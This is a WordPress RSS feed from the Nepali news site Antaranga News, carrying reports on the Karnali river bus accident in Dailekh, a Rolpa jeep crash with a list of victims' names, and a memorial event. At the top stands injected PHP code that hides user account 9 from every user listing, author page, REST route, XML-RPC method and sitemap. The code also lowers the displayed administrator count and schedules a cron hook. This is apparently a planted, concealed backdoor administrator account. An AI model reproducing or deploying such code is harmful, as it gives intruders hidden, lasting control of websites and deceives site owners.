add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
कर्णाली प्रदेश – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
News from Gandaki ProvinceSat, 11 Jul 2026 13:12:13 +0000en-US
hourly
1 https://wordpress.org/?v=7.0.2https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpgकर्णाली प्रदेश – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
3232कर्णाली राजमार्गको साङ्गेतडा दुर्घटनाको नवौ दिन : चालक सुवेदीको शव फेला
https://www.antaranganews.com/?p=49982
https://www.antaranganews.com/?p=49982#respondSat, 11 Jul 2026 13:12:13 +0000https://www.antaranganews.com/?p=49982साङ्गेतडा(दैलेख)– दैलेखमा भएको बस दुर्घटनाको आज नवौं दिन चालक तुलाराम सुवेदीको शव फेला परेको छ । दुर्घटनाको नौ दिनपछि असार २७ गते बिहान करिब ७ बजे उनको शव भेटिएको प्रहरीले असार २७ गते जनाएको हो ।
कर्णाली राजमार्गको दैलेख संगेतरा क्षेत्रमा नदीमा खसेर भएको सवारी दुर्घटनामा परेर चालक तुलाराम सुवेदी बेपत्ता भएका थिए । सो बसबाट हराएकाहरूका
खोजीका क्रममा उनको शव फेला परेको प्रहरी भनाइ छ ।
चालक सुवेदी सुर्खेतको पञ्चपुरी नगरपालिका– ८, माझीगाउँ निवासी हुन् । उनको शव अछामको तुर्माखाँद गाउँपालिका– २, जमगडास्थित कर्णाली नदीको किनारमा फेला परेको जिल्ला प्रहरी कार्यालय दैलेखका प्रमुख एवम् प्रहरी नायव उपरीक्षक श्रवणकुमार विकले जानकारी दिनु भयो । उहाँका अनुसार तुलारामका बुवाले शव बुझेर लग्नु भएको छ ।
उहाँले भन्नुभयो, ‘उनको शव आज बिहान ७ बजेको समयमा अछामको तुर्माखाँद गाउँपालिका– २ जमगडास्थित कर्णाली नदीको किनारमा भेटिएको हो ।’
उक्त दुर्घटनामा बेपत्ता भएका चालकका सहोदर भाइ तथा गाडीका सहचालक रामप्रसाद सुवेदीको अवस्था भने अझै खुल्न नसकेको प्रहरीको भनाइ छ ।
यही असार १८ गते सुर्खेतबाट कालीकोटतर्फ जाँदै गरेको कर्णाली प्रदेश ०२–००१ ख १०५५ नम्बरको फोर्स गाडी बिहान करिब ११ः३० बजे दैलेखको चामुण्डा बिन्द्रासैनी नगरपालिका– ७ स्थित सडकबाट झन्डै ४०० मिटर तल कर्णाली नदीमा खसेको थियो । त्यसपछि गाडी नदीमा डुबेर बेपत्ता भएको हो । गोताखोरको टोलीले समेत बस फेला पार्न सकेको थिएन ।
सहचालक सुवेदी र दुर्घटनाग्रस्त गाडीको अवस्था अझै अज्ञात छ । उनीहरूको खोजीकार्य जारी रहेको प्रहरी भनाइ छ ।
दुर्घटनाका बेला गाडीमा पाँचजना सवार भएको अनुमान छ । उनीहरूमध्ये कालीकोटको पचालझरना गाउँपालिका– ९ का ५४ वर्षीय जेखे तिरुवा भीरमा अड्किएको अवस्थामा जीवितै फेला परेको भए पनि उपचारका क्रममा उनलाई अस्पतालले मृत घोषणा गरेको थियो ।
कालिकोटको रास्कोट नगरपालिका– २ की १८ वर्षीया सिर्जना खड्काको शव मंगलबार पश्चिम सुर्खेतको चौकुने गाउँपालिका— ४ मा पर्ने डङ्डगे क्षेत्रमा भेटिएको थियो । प्रहरीका अनुसार अन्यको शव यसअघि फरक– फरक मिति र स्थानमा भेटिएको थियो । चालक तुलाराम सुवेदीको शव फेला परेसँगै दुर्घटनामा मृत्यु हुनेको संख्या चार पुगेको छ ।
अझै एक जना र गाडीको अवस्था भने अज्ञात नै रहेको प्रहरीले जनाएको छ । घटनामा बेपत्ता भएका उनका भाइ तथा गाडीका सहचालक रामप्रसाद सुवेदीको अवस्था भने अझै अज्ञात छ । गाडी र यात्रुको खोजीका लागि गोताखार समेत परिचालन गरिएको थियो । खोजीका लागि तीनवटै सुरक्षा निकायका अधिकारी सक्रिय रहे पनि पत्ता लगाउन सकेका छैनन् ।
]]>
https://www.antaranganews.com/?feed=rss2&p=499820कर्णालीमा खसेर वेपत्ता फोर्स गाडी खोज्न प्रदेश सरकारद्वारा गृह मन्त्रालयसँग सहयोग माग
https://www.antaranganews.com/?p=49810
https://www.antaranganews.com/?p=49810#respondFri, 03 Jul 2026 12:53:09 +0000https://www.antaranganews.com/?p=49810सुर्खेत– कर्णाली प्रदेश सरकारले कर्णाली नदीमा हिजो खसेर वेपत्ता भएको फोर्स गाडीको खोजी कार्यका लागि गृह मन्त्रालयसँग थप सहयोग र समन्वयको आग्रह गरेको छ । कर्णाली प्रदेशको मुख्यमन्त्री तथा मन्त्रिपरिषद्को कार्यालयले गृह मन्त्रालयलाई पत्र लेख्दै असार १९ गते त्यस्तो माग गरेको हो ।
सुर्खेतबाट कालीकोटतर्फ जाँदै गरेको क.प्र.०२–००१ ख १०५५ नम्बरको फोर्स गाडी खोज्नका लागि प्रदेश सरकारले गृहमन्त्रालयसँग सहयोग माग गरेको हो । दैलेखको चामुण्डाबिन्द्रासैनी नगरपालिका– ७ स्थित कर्णाली राजमार्गको सांगेतडा सडक खण्डबाट सो गाडी कर्णाली नदीमा खसेको थियो । घट्नाको करिब ३० घण्टा वितिसक्दा पनि बसका बारेमा कुनै पत्तो हुन नसकेपछि प्रदेश सरकारले संघ सरकारको गृहमन्त्रालयसँग थप सहयोगको अपिल गरेको हो । उक्त दुर्घट्ना हिजो विहान करिब ११ः३० बजे भएको प्रहरी भनाइ छ ।
दुर्घटनापछि गोताखोर ६ जना सहित नेपाल प्रहरी, सशस्त्र प्रहरी बल तथा स्थानीय बासिन्दाको टोली तत्काल घटनास्थलमा परिचालन भई खोज तथा उद्धार कार्य सुरु गरिएको छ । प्रदेश सरकारले हालसम्म एकजना यात्रुको शव फेला परेको उल्लेख गर्दै दुर्घटनाग्रस्त सवारीसाधन र त्यसमा सवार अन्य यात्रुको अवस्था अझै अज्ञात रहेको पत्रमा उल्लेख गरेको छ ।
घटनास्थलमा खटिएको जनशक्ति पर्याप्त नभएपछि खोज तथा उद्धार कार्यलाई तीव्र बनाउन थप सहयोग तथा आवश्यक समन्वय गरिदिन प्रदेश सरकारले गृह मन्त्रालयसँग अनुरोध गरेको बताइएको छ ।
सो बसमा के कति यात्रु सवार थिए भन्ने पनि यकिन हुन सकेको छेन । सुर्खेतबाट भने दुई चालक दल(दाजु र भाइ) समेत तीन यात्रको चलान काटिएको खुल्न आएको प्रहरीले जनाएको छ । प्रहरीका अनुसार बीच बाटोमा के कति यात्रु चढेका थिए भन्ने खुल्न सकेको छैन ।
]]>https://www.antaranganews.com/?feed=rss2&p=498100कर्णाली बस दुर्घटना : २४ घण्टा बित्यो, एकजनाको पहिचान खुल्यो, अन्य यात्रुको स्थिति अज्ञात, नदीमा डुबेको गाडी अझै फेला परेन
https://www.antaranganews.com/?p=49802
https://www.antaranganews.com/?p=49802#respondFri, 03 Jul 2026 08:42:04 +0000https://www.antaranganews.com/?p=49802सांगेतारा(दैलेख)– दैलेखको चामुण्डाबिन्द्रासैनी नगरपालिका– ७ सांगेतारामा हिजो भएको फोर्स गाडी दुर्घटनामा भीरबाट खसेर मृत्यु भएका एकजनाको पहिचान खुलेको छ । दैलेख दुर्घटनाको २४ घण्टा बित्यो, कर्णालीमा हेलिएको गाडी अझै भेटिएन नसकेको छैन भने यात्रीको संख्या यकिन हुन सकेको छैन । कर्णाली नदीमा खसेको गाडी असार १९ गते मध्यान्ह १ बजेसम्म पनि फेला पर्न नसकेको हो ।
पहिचान भएका मृतक कालीकोट पचालझरना गाउँपालिका– ९ निवासी जोखे तिरुवा भएको प्रहरीले जनाएको छ । प्रहरीका अनुसार मृतकका बुबाले शवको सनाखत गरेपछि मृतकको पहिचान खुलेको हो ।
दैलेख दुर्घटनाको २४ घण्टा बित्यो, कर्णालीमा हेलिएको गाडी अझै भेटिएन नसकेको छैन भने यात्रीको संख्या यकिन हुन सकेको छैन । नेपाल प्रहरी र सशस्त्र प्रहरीको संयुक्त टोलीले नदीमा बेपत्ता गाडी तथा सम्भावित यात्रुको खोजी कार्यलाई तीव्र बनाएको जिल्ला प्रहरी कार्यालय दैलेखका प्रमुख प्रहरी नायव उपरीक्षक श्रवणकुमार विश्वकर्माले बताउनु भयो । उहाँका अनुसार प्रारम्भिक सूचना अनुसार सो गाडीमा १४ जना सवार भएको अनुमान गरिएको भएता पनि पछि भने ५ देखि ६ जना सवार रहेको बुझिएको छ ।
सुर्खेतबाट कालीकोटतर्फ जाँदै गरेको कर्णाली प्रदेश ०२–००१ ख १०५५ नम्बरको फोर्स गाडी सांगेतारा क्षेत्रमा दुर्घटना भएको थियो । बिहान करिब साढे ११ बजेतिर कर्णाली नदीमा गाडी नदीमा बेपत्ता भएकाले त्यसको खोजीका लागि सशस्त्र प्रहरी बल नेपाल नम्बर ६ महेश्वरी बाहिनी मुख्यालय, सुर्खेतबाट गोताखोरसहितको विशेष टोली परिचालन गरिएको दैलेखका प्रहरी प्रमुख विश्वकर्माले जानकारी दिनुभयो । उहाँका अनुसार दुर्घटनाग्रस्त गाडीमा कतिजना सवार थिए भन्ने यकिन विवरण अझै प्राप्त हुन सकेको छैन । उहाँले भन्नुभयो, ‘दुर्घटनाको कारणसमेत खुल्न बाँकी रहेको छ ।’ वर्षाले नदीमा जलसतह बढेको र पानी धमिलो भएका कारण गाडी अझै फेला पर्न सकेको छैन ।
कर्णाली नदीको पानी अत्यधिक धमिलो रहेकाले खोजी तथा उद्धार कार्यमा कठिनाइ भइरहेको सशस्त्र प्रहरी बलका महेश्वरी बाहिनीका प्रहरी उपरीक्षक करणसिंह धामीले बताउनु भयो । उहाँका अनुसार प्रतिकूल अवस्थाका बाबजुद गोताखोर टोलीले निरन्तर खोजी जारी राखेको छ तर उपलब्धि हुन सकेको छैन । गाडीका चालक र सहचालक सहोदर दाजु–भाइ :
यसैबीच, हिजो कर्णाली नदीमा खसेको गाडीको चालक र सहचालक सहोदर दाजु–भाइ रहेको खुल्न आएको छ । तर उनीहरू दुवैको अवस्था अज्ञात छ । त्यो रूटम तुलारामले आफ्नै गाडी चलाउन थालेको दुई–तीन महिना मात्रै भएको थियो ।
उक्त गाडी सुर्खेतको पञ्चपुरी नगरपालिका– ७ माझीगाउँका २८ वर्षीय तुलाराम सुवेदीले चलाएका थिए। गाडीमा उनका सहोदर दाइ ३१ वर्षीय रामप्रसाद सुवेदी सहचालक रहको खुलेको छ ।
तुलारामले गएको दसैँमा मात्रै त्यो गाडी किनेको उनको काका नाता पर्ने डिल्ली सुवेदीले बताउनु भयो । उहाँका अनुसार त्यसअघि तुलाराम दिदीको गाडी चलाउँथे । उहाँका अनुसार दुवै दाजु–भाइका श्रीमती र स–साना छोरा–छोरी पनि छन् । दुई भाइ नै कर्णालीमा बेपत्ता भएको खबरले घर परिवार, आफन्त र छरछिमेक चिन्ता छाएको छ डिल्लीले बताउनु भयो । उनीहरूले छिटोभन्दा छिटो खोजी गरिदिन सरकारसँग आग्रह गरेका छन् ।
रामप्रसाद र तुलारामका श्रीमती कलिला सन्तान च्यापेर श्रीमान खोज्न घटनास्थल गएको काका डिल्लीको भनाइ छ । उहाँका अनुसार गाडी किनेपछि तुलारामले भारतमा रहेका आफ्ना दाइ रामप्रसादलाई पनि बोलाएका थिए । दाजु–भाइ मिलेर काम गर्दा घर गृहस्थी चलाउन पनि सजिलो हुँदै गएको थियो ।
उहाँले भन्नुभयो, ’आफ्नो ठाउँमा केही गरौं भनेर ऋण लिएर गाडी किनेका थिए । सबै कर्णालीले लग्यो ।’
रामप्रसाद र तुलाराममध्ये एक जनाले दैलेखको एउटा होटेलमा फोन गरेर आफूहरू आउँदै गरेको जानकारी गराउँदै खाना तयार राख्न भनेको पनि खुलेको भए पनि गाडीमा कति यात्रु थिए भनेर अहिलेसम्म नखुलेको डिएसपी विश्वकर्माले बताउनु भयो । उहाँका अनुसार आज बिहानदेखि फेरि दुर्घटनास्थल कर्णाली नदी आसपासमा खोजी कार्य जारी रहेको छ ।
उहाँले भन्नुभयो, ‘हिजो जस्तै आज पनि एपिएफका गोताखोरहरूबाट कर्णालीमा डुबेका गाडीसंगै यात्रुको खोजी गर्ने कार्य सुरु भएको छ, तर पानी परेकाले खोजीकार्यमा कठिनाइ भएको छ ।’
सशस्त्र प्रहरी बल नेपाल नम्बर ६ महेश्वरी बाहिनी मुख्यालय सुर्खेतबाट हिजो दिउँसो करिब १ः३० बजे घटना स्थलतर्फ गएकोमा घटनास्थल पुग्दा साँझको करिब ५ः३० बजेको थियो सशस्त्र प्रहरीका सहप्रवक्ता एवं डिएसपी शैलेन्द्र थापाले बताउनु भयो । उहाँका अनुसार ६ जना गोताखोर साथमा गएका छन् । घट्नास्थल बाहिनीबाट झन्डै ९५ किलोमिटर दुरीमा रहेको छ ।
बेपत्ता भएको गाडीसहितका यात्रुहरुको खोजीका लागि झन्डै एक सय सुरक्षाकर्मी तथा त्यत्तिकै संख्यामा स्थानीय लागि परेका प्रनाउ विश्वकर्माले जानकारी दिनुभयो । उहाँका अनुसार दुर्घटनास्थल अफ्ठ्यारो र जोखिमयुक्त स्थान भने होइन । घुम्ती वा मोड तथा ठूलो उकालो पनि छैन । सडक पनि कालोपत्रे छ । उहाँल्े भन्नुभयो, ‘अचानक उत्पन्न यान्त्रिक त्रुटि वा सामान्य मानवीय त्रुटिका कारण गाडी कर्णालीमा खसेको हुनसक्छ ।’
हालसम्म पनि गाडीमा कति जना यात्रु सवार थिए भन्ने यकिन भइसकेको छैन दैलेखका प्रहरी प्रवक्ता प्रहरी निरीक्षक ऋषिराज गौतम हरिजनले बताउनु भयो । उहाँका अनुसार सुर्खेतमा ३ जना यात्रुले चलानी काटेको खुलेको छ ।
थप अनुसन्धानपछि खुल्ने छ उहाँले उल्लेख गर्नु भयो ।
]]>https://www.antaranganews.com/?feed=rss2&p=498020कर्णालीमा यात्रुबाहक बस दुर्घटना, १३ बेपत्ता एकको शव फेला, उद्धार कार्य जारी
https://www.antaranganews.com/?p=49797
https://www.antaranganews.com/?p=49797#respondThu, 02 Jul 2026 14:08:08 +0000https://www.antaranganews.com/?p=49797चामुण्डाबिन्द्रासैनी(दैलेख)– दैलेख जिल्लाको स्थानीय नगरपालिका– ७ को कर्णाली राजमार्गमा साङ्गेतडा सडकखण्डमा यात्रुबाहक बस दुर्घटनामा परेको छ । सो घट्नामा १३ जना बेपत्ता भएको एक जनाको शव फेला परेको र उद्धार कार्य जारी रहेको प्रहरीले आज असार १८ गते जनाएको छ ।
सुर्खेतबाट कालीकोटतर्फ जाँदै गरेको क.प्र. ०२–००१ ख १०५५ नम्बरको बस आज बिहान करिब साढे ११ बजे दुर्घट्नामा परेको जिल्ला प्रहरी कार्यालय दैलेखले जनाएको छ । बस सडकबाट करिब ६ सय मिटर तल कर्णाली नदीमा खसेको जिल्ला प्रहरी कार्यालय दैलेखका प्रमुख प्रहरी नायव उपरीक्षक श्रवणकुमार बिकले बताउनुभयो । उहाँका अनुसार बेपत्ता भएका यात्रुहरूको खोजी कार्य जारी रहेको छ । उहाँले भन्नुभयो, प्रारम्भिक सूचना अनुसार उक्त बसमा १३ नना यात्रु सवार थिए ।
प्रभावकारी उद्धारका लागि सशस्त्र प्रहरी बल, गोताखोरको टोली, नेपाल प्रहरी तथा माथिल्लो कर्णाली जलविद्युत् आयोजना सुरक्षा बेसबाट संयुक्त टोली खटिएको छ । उद्धार टोली ३५ जना प्रहरी परिचालन भएको प्रहरी भनाइ छ ।
दुर्घटनास्थल प्रहरी चौकी पाल्तडाबाट करिब ३ किलोमिटर तथा जिल्ला प्रहरी कार्यालय दैलेखबाट करिब ५० किलोमिटर पश्चिममा पर्छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=497970भगवती शाही स्मृति स्तम्भ उद्घाटन कार्यक्रमको फोटो फिचर
https://www.antaranganews.com/?p=49014
https://www.antaranganews.com/?p=49014#respondWed, 27 May 2026 00:35:07 +0000https://www.antaranganews.com/?p=49014अछाम– बागेश्वरी धार्मिक तथा पर्यटकीय क्षेत्र बिकास समिती नागपर्वत नाडा अछाममा भगवती शाही स्मृति स्तम्भ उद्घाटन भएको छ ।
नेपाल सरकारका पूर्व सचिव कृष्णहरि बास्कोटाले सो स्तम्भको जेठ १२ गते उद्घाटन गर्नु भएको हो ।
प्रमुख अतिथि बास्कोटाले धार्मिक, पर्यटकिय क्षेत्रको रुपमा रहेको बागेश्वरी क्षेत्रको प्रचार प्रसार गर्नु पर्नेमा जोड दिनुभयो । नेपाल सरकारका पूर्व सचिव कृष्णहरि बास्कोटाको अनुदानमा २०७६ साल माघ १४ गते उक्त स्तम्भ निर्माण भएको थियो । कार्यक्रममा नेपाल सरकारका पूर्व सचिव कृष्णहरि बास्कोटालाई भव्य स्वागत सहित सम्मान प्रदान गरिएको थियो ।
तुर्माखाँद– ४ नागपर्वत अछाममा रहेको अति प्राचीन बागेश्वरी मन्दिर स्थापना गर्ने स्वर्गीय भगवती शाहीको सम्मान र सम्झनामा सो स्तम्भ निर्माण गरिएको समितिका अध्यक्ष लोकेन्द्र बहादुर शाहले बताउनु भयो ।
उहाँकै अध्यक्षतामा भएको कार्यक्रमको समितिका सल्लाहकार नमस्कार शाहले सञ्चालन गर्नु भएको थियो । कार्यक्रममा संस्थाका कार्यसमिति सदस्य जनक बहादुर शाहीले स्वागत मन्तव्य व्यक्त गर्नु भएको थियो ।
कार्यक्रममा बास नेपालका पूर्ब अध्यक्ष मन भण्डारी, समितिका पदाधिकारी, सदस्यहरूको सहभागिता रहेको थियो । प्रस्तुत छ, उक्त कार्यक्रमको फोटो फिचर :
]]>https://www.antaranganews.com/?feed=rss2&p=490140रोल्पाको जीप दुर्घटना : पीडा बल्झियो लमजुङमा पनि !
https://www.antaranganews.com/?p=48593
https://www.antaranganews.com/?p=48593#respondSat, 02 May 2026 02:39:04 +0000https://www.antaranganews.com/?p=48593बेसीशहर– सडक दुर्घटना दुःखद हुन्छ । रोल्पाको जलजलामा भएको बोलेरो जिप दुर्घटनाले निकै दुःखद् अवस्था बैशाख १७ गते सिर्जना गर्यो । सो जीपमा यात्रा गरेका एक जनाबाहेक १९ जना यात्रु र चालकसमेत २० जनाले ज्यान गुमाएको स्थानीय प्रहरी प्रशासनले पुष्टि गर्यो । सो घट्नाको सनाखतका क्रममा लमजुङका २ जना आमा– छोराले ज्यान गुमाएको १८ गते अबेर सार्वजनिक भएसँगै त्यो घट्नाको पीडाले लमजुङ पनि अछुत रहन सकेन । रोल्पाको त्यो पीडा लमजुङमा पनि बल्झिएको छ ।
प्रहरीले दुर्घटनामा परेकाहरूका २० जनामध्ये १२ महिला र ४÷४ जना पुरुष र बालक थिए । जसमा एक महिला र बालक लमजुङका आमा छोरा रहेछन् । प्रहरीले सनाखतका क्रममा दुवै जनाको ठेगाना दाङको घोराही उपमहानगरपालिका– १५, रतनपुर उल्लेख ग¥यो । किनकि, उनी माइती÷मावली पक्षसँगै घुम्न रुकुम– रोल्पा गएका थिए । वैशाख १३ गते माइतमा पूजा हुने भएकाले एलिसा थापा १२ गते नै छोरा लिएर लमजुङबाट माइत गएको खुल्न आयो ।
उता दुर्घटनामा पर्ने २० जनामध्ये एकै घरका ७ जना र अन्य ७ जना पनि उनीहरूकै आफन्त भएको समाचार सार्वजनिक भइसकेको थियो । त्यही सात जना आफन्तमा लमजुङका आमा छोरा पनि रहेछन् । दाङ घोराही– १५ का वडाध्यक्ष वीरेन्द्र बस्नेतका अनुसार मृतक युभा बिसीको माइतीतर्फ रतनपुरकी ५४ वर्षीया द्रौपदा जिसी, यमबहादुर जिसी, २५ वर्षीया एलिसा जिसी र ३२ वर्षीया तिला विष्ट जिसीको पनि ज्यान गएको छ । त्यस्तै एलिसाका छोरा संयोग जिसी तथा तिलाका सन्तान जेनिसा र जेनिस जिसीको दुर्घटनामा परी मृत्यु भएको समाचारमा उल्लेख भएको पाइयो ।
ती आमाछोरा एलिसा र संयोग लमजुङको मस्र्याङ्दी गाउँपालिका– ९, पामचोकका स्थायी बासिन्दा थिए । जसका कारण लमजुङमा पीडा माथि पीडा थपियो । एलिसा बेसीशहरस्थित मोडेल सिटी हस्पिटलमा अनमी थिइन् । त्यही क्रममा सो अस्पतालले आफ्नो कर्मचारीको निधन भएको भन्दै शोक विज्ञप्ति जारी गर्यो । मृतककी आफन्त पार्वती थापाले त्यस घट्नाको पुष्टि गर्नु भयो ।
रुकुमपूर्वबाट थवाङ गाउँपालिका– १ जलजलातर्फ जाँदै गरेको लु १ ज ४१६७ नम्बरको बोलेरो जिप दुर्घटना भएको थियो । सडकबाट करिब आठ सय मिटर तल खोचमा खसेको जिप दुर्घटनामा परेकाको १८ घण्टा वित्दासमेत उद्धार हुन सकेको थिएन । छंगाछुर भीर भएका कारण घट्ना स्थलमा पुग्न तीन सुरक्षा निकायलाई हम्मेहम्मे परेको थियो ।
तर एलिजाको नाम र उमेरले शंका उत्पन्न गराएको थियो । मोडेल सिटी हस्पिटलले आफ्नो कर्मचारी (अनमी) लोजिना जिसीको निधन भएको भन्दै शोक विज्ञप्ति जारी गरिसकेको थियो । सामाजिक सञ्जालमा उनको नाम लोजिना घर्ती रहेको छ । त्यो नाम उनको नागरिकता प्रमाणपत्रमा उल्लेख भएको हस्पिटलका अध्यक्ष ईश्वर श्रेष्ठ जोशीले बताउनु भयो । उहाँका अनुसार एलिसा भनेर चिनिने लोजिना जिसी भनेर उल्लेख गरिएको हो ।
परिवारिक स्रोतका अनुसार पामचोकका सुशील थापाले दाङको घोराहीमा एलिसा (लोजिना)सँग विवाह गर्नु भएको थियो । विवाह गरेको करिब पाँच वर्ष भएको थियो । उनीहरूको प्रेमको उपलब्धिका रुपमा प्राप्तभ भएको चार वर्षीय छोरा संयोग पनि आमासँगै अस्ताएका छन् । एलिसाका श्रीमान् सुशील थापा हाल इटालीमा वैदेशिक रोजगारीमा रहेको परिवारको भनाइ छ ।
थापाले आफ्नो सामाजिक सञ्जाल पेजमा श्रीमती र छोरासँगको तस्बिर सार्वजनिक गर्दै हृदयविदारक स्टाटस लेख्दै भन्नु भएको छ, ‘तिमीहरू बाहेक यो जिन्दगी शून्य छ । अर्को जुनी भयो भने फेरि प्रिय श्रीमती र छोरा भएर भेटुँला ।’
थापाले सार्वजनिक गरेका तस्बिरहरू पनि रंगीन नै छन् । न त उहाँका आफन्त र शुभेच्छुकहरूले नै ती तस्बिरहरूलाई श्याम–श्वेत बनाएका छन् । अतः यो पंक्तिकारलाई पनि त्यो हिम्मत आएन । त्यसका लागि ती स्वर्गीय आत्माहरू, उनीहरूमा परिवारजन तथा आफन्तहरू सबैसँग क्षमायाचना गर्दछौं ।
दिवंगत लमजुङका आमा– छोरासहित सबैप्रति भावपूर्ण श्रद्धाञ्जली ! शोक सन्तप्त परिवारजनमा हार्दिक समवेदना ।
तस्बिर स्रोत ः सुशील थापाको फेसबुक पेज ।
]]>https://www.antaranganews.com/?feed=rss2&p=485930रोल्पा जिप दुर्घटना अपडेट : ज्यान गुमाएका बीसै जनाको भयो सनाखत, नामवली समेत
https://www.antaranganews.com/?p=48576
https://www.antaranganews.com/?p=48576#respondFri, 01 May 2026 10:41:28 +0000https://www.antaranganews.com/?p=48576रोल्पा– रोल्पामा हिजो भएको जिप दुर्घटनाको पछिल्लो अपडेट प्राप्त भएको छ । सो घट्नामा ज्यान गुमाएका बीसै जनाको पहिचान गरी सम्बन्धित परिवारलाई शव बुझाउने काम भइरहेको रोल्पा प्रहरीले बैशाख १८ गते जनाएको छ ।
रोल्पाको जलजलामा वैशाख पूर्णिमाका मेलामा सहभागी हुन गएका तीर्थालु बोकेको बोलेरो जिप हिजो दिउँसो करिब ३ बजेको समयमा दुर्घटना हुँदा २० जनाको मृत्यु भएको रोल्पा प्रहरीले हिजै जानकारी दिएको हो । ज्यान गुमाएका २० जनाकै सनाखत भएको जिल्ला प्रहरी कार्यालय रोल्पाका प्रमुख डीएसपी वीरन्द्रकुमार विश्वकर्माले बताउनु भयो । उहाँका अनुसार मृतकहरू सिस्ने गाउँपालिका– ५, टाकुरा, रुकुम पूर्व, भुमे ५, रुकुम पूर्व र दाङका विभिन्न स्थानका छन् । उहाँले भन्नुभयो, ‘रोल्पाको जिप दुर्घटनामा ज्यान गुमाएकाहरूको पहिचान खुलेको छ ।’
सो घट्नामा घाइते समीर कामी उपचारपछि घर फर्किसकेका छन् डीएसपी वीरन्द्रकुमार विश्वकर्माले भन्न्नुभयो । उहाँका अनुसार घाइते समीर कामी सिस्ने– ५ का हुन् उनी उपचारपछि घर फर्किसकेका छन् । उहाँले भन्नुभयो, ‘अहिले शवहरू दुर्घटनास्थलबाट निकालेर परिवारलाई बुझाउने काम भइरहेको छ ।’
मृतकमा लु १ज ४१६७ नम्बरको बोलेरो जिपका चालक समेत रहेको प्रहरीले जनाएको छ । प्रहरीका अनुसार जीप सडकबाट करिब आठ सय मिटर तल खोचमा खसेको थियो ।
उनीहरू सबै रोल्पाको जलजलामा वैशाख पूर्णिमाका अवसर लाग्ने मेलामा सहभागी हुन गएकाहरू हुन् । उनीहरू चढेको दुर्घटनामा परेको हो । दुर्घटनामा ज्यान गुमाउनेहरू सिस्ने गाउँपालिका– ५ टाकुरा गाउँका, घोराही उपमहानगरपालिका– १५, रतनपुर, दाङका र भूमे गाउँपालिका रुकुमपूर्वका छन् ।
सो दुर्घटनामा ज्यान गुमाएकाहरूको नामावली ः
दाङको घोराही– १५, रतनपुर घर भएकाहरू ः
१. बेदु कामी (४२ वर्ष) – सवारी चालक
२. दोरपती जिसी (५४ वर्ष)
३. तिला जिसी (३२ वर्ष)
४. जेनिस जिसी (७ वर्ष)
५. जेनिसा जिसी (१२ वर्ष)
६. एलिना जिसी (२५ वर्ष)
७. संयोग जिसी (७ वर्ष)
८. यमबहादुर जिसी (उमेर नखुलेको) घोराही–१३, दाङ
९. धनमाया विष्ट शान्तिनगर, दाङ (हालः सिस्ने– ५, रुकुम पूर्व)
रुकुम पूर्व भुमे– ५, घर भएका ः
१. टेकप्रसाद बुढामगर
सिस्ने– ५, टाकुरा, रुकुम पूर्व घर भएकाहरू (१० जना)
१. गोर्ख बहादुर बुढाथोकी (३२ वर्ष)
२. तिलकुमारी बुढाथोकी (५३ वर्ष)
३. युवा बुढाथोकी (२८ वर्ष)
४. दिव्यन बुढाथोकी (१० वर्ष)
५. सृजना बुढाथोकी (२४ वर्ष)
६. सुदीप बुढाथोकी (१३ वर्ष)
७. ओमकुमारी बुढाथोकी (४० वर्ष)
८. मीना कामी (६० वर्ष)
९. लक्ष्मी शाह (६० वर्ष) र
१०. रुक्मिणा बस्नेत रहेका छन् ।
]]>https://www.antaranganews.com/?feed=rss2&p=485760रोल्पा जिप दुर्घटना– मृतक संख्या २० पुग्यो, एक जना घाइते : थप खोज तथा उद्धार कार्य पुनः सुरु, शव संकलनपछि मात्र पहिचानको काम गरिने
https://www.antaranganews.com/?p=48534
